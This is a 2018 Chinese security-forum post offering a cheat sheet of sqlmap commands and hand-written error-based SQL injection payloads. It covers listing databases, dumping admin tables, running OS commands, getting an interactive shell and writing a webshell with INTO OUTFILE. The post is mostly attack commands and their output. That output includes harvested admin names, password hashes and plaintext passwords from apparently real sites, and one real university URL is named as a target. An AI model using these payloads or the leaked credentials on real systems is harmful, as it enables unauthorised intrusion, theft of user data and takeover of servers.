[原创]SqlMap 基础注入命令-WEB安全-看雪-安全社区|安全招聘|kanxue.com

[原创]SqlMap 基础注入命令

发表于: 2018-7-23 20:28 8306

[原创]SqlMap 基础注入命令

c0py_ninj4 活跃值

2018-7-23 20:28

8306

SqlMap 基础注入命令

aspx注入笔记：

sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ -v 1 -f

/******************

[02:54:48] [INFO] testing Microsoft SQL Server

[02:54:48] [INFO] confirming Microsoft SQL Server

[02:54:48] [INFO] the back-end DBMS is Microsoft SQL Server

web server operating system: Windows 2003 or XP

web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0

back-end DBMS: active fingerprint: Microsoft SQL Server 2005

[02:54:48] [WARNING] HTTP error codes detected during run:

500 (Internal Server Error) – 2 times

******************/

获取当前用户名字

sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ -current-user

获取当前数据库名字

sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ -current-db

查看当前用户帐号

sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ –privileges

执行cmd命令

sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ –os-cmd=”net stop policyagnet”

执行sql命令

sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ –sql-shell

系统交互shell

sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ –os-shell

反弹shell

sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ –os-shell

高级注入

多参数通过-p指定单个参数

sqlmap -u “http://xxx.xxx.xxx/xx.php?name=111&id=1&pid=101″ -p name

1：列数据库

sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ –tables

遍历所有的数据库

sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ –dbs

2:列出 XX库下面的所有表名字 -D xx

sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ -D msdb –tables

3:列出某个表下面的字段

sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ -D weijienewdb -T EAdmin –columns

****

sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ -D weijienewdb -T EAddress –columns

EAddress

*****

Database: weijienewdb

Table: EAdmin

[8 columns]

+—————+———-+

| Column | Type |

+—————+———-+

| AdminName | varchar |

| AdminPassword | varchar |

| AdminStatus | int |

| ID | int |

| LastAccess | datetime |

| Permission | varchar |

| RealName | varchar |

| Rem | varchar |

+—————+———-+

4:爆字段内容

sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ -D weijienewdb -T EAdmin -C AdminName –dump

Database: weijienewdb

Table: EAdmin

[3 entries]

+———–+

| AdminName |

+———–+

| admin |

| hzweijie |

| ihangjing |

+———–+

sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ -D weijienewdb -T EAdmin -C AdminPassword –dump

Database: weijienewdb

Table: EAdmin

[3 entries]

+———————————-+

| AdminPassword |

+———————————-+

| 5a3d3ff3726166cfcdafd12b128098b0 |

| a10857e51018b45c925b599222557517 |

| c7b34dc8de164efca48e088119840f98 |

+———————————-+

5:脱裤

| EAddress

sqlmap -u “http://www.xxxxxxxx.com/userhome/ajax/getaddressbase.aspx?cityid=1″ -D weijienewdb -T EAddress -C Address,Phone,Mobilephone,DataID,rim_address –dump –threads=10 –start=1 –stop=10

–start –stop 多少条数据

+————-+———-+

| Column | Type |

+————-+———-+

| Address | varchar |

| AddTime | datetime |

| BuildingID | int |

| DataID | int |

| Lat | varchar |

| Lng | varchar |

| Mobilephone | varchar |

| Phone | varchar |

| Pri | int |

| Receiver | varchar |

| rim_address | varchar |

| rim_num | int |

| rim_parity | int |

| rim_type | int |

| Tab | varchar |

| UserID | int |

| ZoneCode | varchar |

| ZoneName | varchar

asscee 注入笔记

1、sqlmap.py -u "注入地址" 判断是否有注入

猜表 2、sqlmap.py -u "注入地址" --tables

猜字段 3、sqlmap.py -u "注入地址" --columns -T admin（表名）

猜内容 4、sqlmap.py -u "注入地址" --dump -T admin -C username，password --dump

cookie注入笔记：

1、sqlmap -u "注入地址asp的" --cookie "id=数字" --table --level 2 判断数据库

2、sqlmap -u "注入地址asp的" --cookie "id=数字" --columns -T 表段（admin） --level 2

3、sqlmap -u "注入地址asp的" --cookie "id=数字" --dump -T admin -C "username，password" --level 2

mysql数据库注入笔记：

1、sqlmap -u 注入地址php --dbs 获取数据库

2、sqlmap -u 注入地址php -D 数据库名 --tables 获取数据库中的表

3、sqlmap -u 注入地址php -D 数据库名 -T 表名 --columns 获取字段

4、sqlmap -u 注入地址php -D 数据库名 -T 表名 -C id，字段名，表名 --dump 获取账号密码

PHP后台登陆框手工注入语句：

'and(select 1 from(select count(*),concat((select concat(相关函数1,0x20,相关函数2,0x20,......) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

1.爆表名

'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=database() limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

2.爆列名

'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=表名的Hex limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=表名的Hex limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=表名的Hex limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

3.爆用户和密码

'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

4.导出Webshell

'or 1 AND (SELECT id FROM the_users limit 1 INTO OUTFILE 'D:/sub/jw/safe1.php' lines terminated by '') #

交互写shell及命令执行:

注意:写shell前提条件 (1.必须是root权限 2.必须知道网站路径 3.GPC设置为off)

--current -user

sqlmap -u 注入地址 --current -user查看用户权限

sqlmap -u 注入地址 --os-cmd=ipconfig 执行完选择4 php

回车指定根目录地址:如 D:/WWW/ 回车

如何获得一个shell

sqlmap -u 注入地址 --os-shell 执行完选择4 php 回车

指定根目录地址:如 D:/WWW/ 回车

执行完后根目录生成2个文件打开可以上传

tmpuoiuz.php

tmpbxbxz.php

+------------+-----------+

| user_pwd | user_name |

+------------+-----------+

| wsadmin | admin |

| qianqian88 | pub |

| wsbee123 | 阙明毅 |

| taobao | 淘宝 |

| admin | admin |

+------------+-----------+

D:/Web/

伪静态注入:

sqlmap -u http://sfl.fzu.edu.cn/index.php/Index/view/id/40*.html --dbs

存在注入的地址加个“*”建。

下同mysql注入一样

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)

收藏・10

免费・0

支持

最新回复 (9)
Hades一KXXY 雪币： 4243 活跃值： (1007) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 81 粉丝 1 关注私信	Hades一KXXY 2 楼支持一下 2018-7-24 12:07 0
wsc 雪币： 152 活跃值： (5344) 能力值： ( LV3，RANK：20 ) 在线值：发帖 132 回帖 573 粉丝 54 关注私信	wsc 3 楼支持一下 2018-7-24 12:38 0
ljhuser 雪币： 4 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 0 关注私信	ljhuser 4 楼支持一下 2018-7-29 22:45 0
叽叽‘and1=1 雪币： 446 活跃值： (600) 能力值： ( LV2，RANK：10 ) 在线值：发帖 20 回帖 84 粉丝 4 关注私信	叽叽‘and1=1 5 楼支持 2018-7-30 00:03 0
domald 雪币： 52 活跃值： (39) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 12 粉丝 0 关注私信	domald 6 楼新知识学习了最后一条 2018-8-14 22:28 0
五哥鸽子雪币： 17 能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	五哥鸽子 7 楼 2019-3-6 13:08 0
kaisa苏斯雪币： 24 能力值： ( LV1，RANK：0 ) 在线值：发帖 1 回帖 10 粉丝 0 关注私信	kaisa苏斯 8 楼 666 2019-3-9 15:32 0
aliujian 雪币： 4 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 5 粉丝 0 关注私信	aliujian 9 楼给力 2019-3-12 18:04 0
蔡文姬雪币： 407 能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	蔡文姬 10 楼支持一下 2019-3-15 10:32 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

c0py_ninj4

发帖

回帖

RANK

关注

私信

他的文章

[推荐]Web方面的信息收集 2652
[原创]SqlMap 基础注入命令 8307

关于我们

联系我们

企业服务

看雪公众号

最新回复 (9)
Hades一KXXY 雪币： 4243 活跃值： (1007) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 81 粉丝 1 关注私信	Hades一KXXY 2 楼支持一下 2018-7-24 12:07 0
wsc 雪币： 152 活跃值： (5344) 能力值： ( LV3，RANK：20 ) 在线值：发帖 132 回帖 573 粉丝 54 关注私信	wsc 3 楼支持一下 2018-7-24 12:38 0
ljhuser 雪币： 4 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 4 粉丝 0 关注私信	ljhuser 4 楼支持一下 2018-7-29 22:45 0
叽叽‘and1=1 雪币： 446 活跃值： (600) 能力值： ( LV2，RANK：10 ) 在线值：发帖 20 回帖 84 粉丝 4 关注私信	叽叽‘and1=1 5 楼支持 2018-7-30 00:03 0
domald 雪币： 52 活跃值： (39) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 12 粉丝 0 关注私信	domald 6 楼新知识学习了最后一条 2018-8-14 22:28 0
五哥鸽子雪币： 17 能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	五哥鸽子 7 楼 2019-3-6 13:08 0
kaisa苏斯雪币： 24 能力值： ( LV1，RANK：0 ) 在线值：发帖 1 回帖 10 粉丝 0 关注私信	kaisa苏斯 8 楼 666 2019-3-9 15:32 0
aliujian 雪币： 4 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 5 粉丝 0 关注私信	aliujian 9 楼给力 2019-3-12 18:04 0
蔡文姬雪币： 407 能力值： ( LV1，RANK：0 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	蔡文姬 10 楼支持一下 2019-3-15 10:32 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复